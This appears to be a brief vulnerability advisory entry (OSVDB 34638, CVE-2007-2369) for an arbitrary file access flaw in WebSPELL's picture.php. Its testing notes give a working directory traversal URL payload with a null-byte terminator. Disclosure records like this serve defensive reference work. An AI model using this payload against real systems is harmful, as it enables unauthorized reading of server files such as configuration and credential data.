WebSPELL picture.php file Variable Traversal Arbitrary File Access

2007-04-05T04:18:23
ID OSVDB:34638
Type osvdb
Reporter OSVDB
Modified 2007-04-05T04:18:23

Description

Manual Testing Notes

http://[target]/[PATH]/picture.php?id=../../../[FILE]%00

References:

Related OSVDB ID: 34637 Other Advisory URL: http://milw0rm.com/exploits/3673 CVE-2007-2369